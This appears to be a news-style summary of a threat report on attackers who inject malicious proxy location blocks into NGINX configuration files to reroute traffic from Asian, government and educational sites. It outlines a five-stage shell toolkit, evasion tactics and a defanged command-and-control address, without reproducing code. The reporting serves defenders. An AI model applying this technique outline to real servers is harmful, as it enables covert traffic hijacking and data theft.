Hackers Compromise NGINX Servers to Redirect User Traffic: A Detailed Analysis
A sophisticated cyber threat actor has been identified compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure. This attack is particularly insidious as it leverages the legitimate functionality of NGINX, an open-source web traffic management software, to carry out its malicious activities.
The Attack Strategy:
- Targeted NGINX Installations: The campaign targets NGINX installations on websites with Asian top-level domains (.in, .id, .pe, .bd, and .th) and government and educational sites (.edu and .gov).
- Malicious Configuration Injections: Attackers modify existing NGINX configuration files by injecting malicious 'location' blocks that capture incoming requests on attacker-selected URL paths. They then rewrite these blocks to include the full original URL and forward traffic via the 'proxypass' directive to attacker-controlled domains.
- Avoiding Detection: The 'proxypass' directive is normally used for load balancing, allowing NGINX to reroute requests through alternative backend server groups. This abuse doesn't trigger security alerts, making it difficult to detect.
- Preserving Legitimacy: Request headers such as 'Host', 'X-Real-IP', 'User-Agent', and 'Referer' are preserved to make the traffic appear legitimate, further complicating detection.
The Multi-Stage Toolkit:
The attack employs a scripted multi-stage toolkit to perform NGINX configuration injections, ensuring precision and control:
- Stage 1: zx.sh - Acts as the initial controller script, downloading and executing subsequent stages. It includes a fallback mechanism for raw HTTP requests if curl or wget are unavailable.
- Stage 2: bt.sh - Targets NGINX configuration files managed by the Baota panel, dynamically selecting injection templates based on server_name values.
- Stage 3: 4zdh.sh - Enumerates common NGINX configuration locations, using parsing tools to prevent corruption. It detects prior injections via hashing and a global mapping file, validating changes before reloading.
- Stage 4: zdh.sh - Focuses on /etc/nginx/sites-enabled, targeting .in and .id domains. It follows a similar configuration testing and reload process, with a forced restart as a fallback.
- Stage 5: ok.sh - Scans compromised configurations, building a map of hijacked domains, injection templates, and proxy targets. Data is exfiltrated to a command-and-control server at 158.94.210[.]227.
Why Detection is Challenging:
These attacks are hard to detect because they don't exploit NGINX vulnerabilities. Instead, they hide malicious instructions in configuration files, which are rarely scrutinized. User traffic still reaches the intended destination, often directly, making the passing through attacker infrastructure less noticeable without specific monitoring.
The Future of IT Infrastructure:
The article concludes with a reference to a Tines guide on the future of IT infrastructure, emphasizing the need for automation and intelligent workflows to keep pace with the rapid evolution of modern IT systems.
